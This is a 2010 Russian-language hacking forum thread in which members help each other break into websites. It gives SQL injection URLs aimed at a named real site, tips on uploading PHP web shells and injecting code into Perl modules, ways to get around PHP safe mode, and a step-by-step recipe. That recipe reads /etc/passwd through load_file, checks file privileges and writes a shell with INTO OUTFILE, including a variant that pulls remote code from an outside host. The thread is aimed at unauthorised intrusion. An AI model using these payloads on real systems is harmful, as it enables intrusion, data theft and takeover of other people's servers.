Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    https://forum.antichat.ru/showpost.php?p=663815&postcount=25
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Случаи, когда в запрос подставляется ответ из другого не так уж и част :(
     
  3. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Да, это не всегда может прокатить и в этом посте об этом упоминается. Дал как вариант :)
     
    1 person likes this.
  4. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Непонятная иньекция

    Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть:
    Code:
    http://tenderjet.com/catalog/371-1
    Плюсики она вроде как тоже кушает:
    Code:
    http://tenderjet.com/catalog/371+-+1
    но вот даже and 1=1 кушать отказывается, ругаясь незнакомыми мне ошибками. и вообще ведет себя странно: например прокатывает такое
    Code:
    http://tenderjet.com/catalog/371-1+1=1
    Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется...
    В общем, нужен взгляд человека со стороны
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://tenderjet.com/catalog/371&&substring(version(),1,1)=5
    
     
  6. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 Train
    Code:
    http://tenderjet.com/catalog/371&&(0)union(select(version()))
    https://forum.antichat.ru/thread125796.html
     
    #13466 RulleR, 9 Jun 2010
    Last edited: 9 Jun 2010
    3 people like this.
  7. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Спасибо за помощь. Кстати я гляжу редкая иньекция - бд mysql доступна.
     
    #13467 Train, 9 Jun 2010
    Last edited: 9 Jun 2010
  8. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    Pashkela
    RulleR

    а можно поподробнее что за &&
    и что за (0) в запросе от RulleR ?
    где об этом можно почитать ?


    http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
    http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEMA.TABLES)) => tender@localhost
     
  9. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Просто все дело было в плюсиках(пробелах) которые эта иньекция не переваривала а &&(0) это тоже самое что и and 0 чтобы первый запрос ничего не вывел.
    INFORMATION_SCHEMA.schemata показывает базу mysql это я поторопился - показывает, но дейстивительно ничего не прочитаешь. Всеравно это к добру - налицо неправильная настройка сервера. файлы вроде тоже не читает, но ничего, прорвемся... как-нибудь
     
    1 person likes this.
  10. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Есть php-скрипт, которому передается два параметра и jpg-файл. Скрипт конвертит jpg в png и закидывает файл в /images/ с именем
    Оба параметра практически не фильтруются(ни по длине, ни по содержанию). Есть способы обрезать конечное расширение ".png", дописываемое скриптом, чтобы залить пхпшный шелл?
    %00 - безуспешно.
     
  11. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Если скрипт КОНВЕРТИТ джипег, а не переименовывает - тогда бесполезно даже пытаться.
     
  12. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Нет же, переименовывает. А то, что конвертит - это общий функционал.
    Я же написал:
    Под параметрами я имел ввиду переменные, передающиеся POST'ом.
     
    #13472 Nek1t, 9 Jun 2010
    Last edited: 9 Jun 2010
  13. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Народ помогите советом.
    Есть уязвимый пёрл скрипт при помощи которого я могу писать в файлы, как мне запихать грёбаную функцию в pm файл который подгружается в других пёрл скриптах , что бы можно было выполнить команду. Сразу говорю писать в сами скрипты незя, слетают права на запуск =(
     
  14. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Я конечно совсем в перле не силен, но если в данной задаче целью является вэб-сервер, то кто мешает записать,например, пхп-шелл, насколько я знаю пхп-скриптам для работы не нужны права на исполнение. Хотя я могу ошибаться.
     
  15. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Да шелл есть, Safe mod там.
     
  16. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод.
    Или в саппорт хостинга написать чтобы отключили :) или поставили права на исполнение твоего перлового скрипта.
     
    #13476 Train, 10 Jun 2010
    Last edited: 10 Jun 2010
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ~dos~ тебе что нужно? задосить сервер или залить шелл?
     
    _________________________
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
    2). потом проверь права на чтение/запись файлов
    http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
    или так
    http://test/news.php?id=1+union+select+1,file_priv,2,3+from+mysql_user+where+user='root')--
    насчет user-а можешь проверить запросом
    http://test/news/php?id=1+union+select+1,user(),2,3--
    выдаст root@localhost, пишешь без всяких локалхостов.
    3). если все данные пункты выполнились на ура, идем дальше.
    http://test/news.php?id=1+union+select+1,'код_шелла',2,3+into+outfile+'полный_путь_сервера'--
    или если не хочешь заморачиваться (обз. условие allow_url_include=on)
    http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_сервера'--
     
    #13478 pinch, 10 Jun 2010
    Last edited: 10 Jun 2010
    1 person likes this.
  19. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия:
    1) file_priv - On
    2) директория на запись
    3) magic_quotes = Off

    Как у тебя с правами (file_priv) ?

    pinch опередил :)
     
    1 person likes this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    с чего ты взял что сервер работает под root-ом ? ))

    $user=select+user()+from+mysql.user

    select+file_priv+from+mysql.user+where+user=$user (hex/char)
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.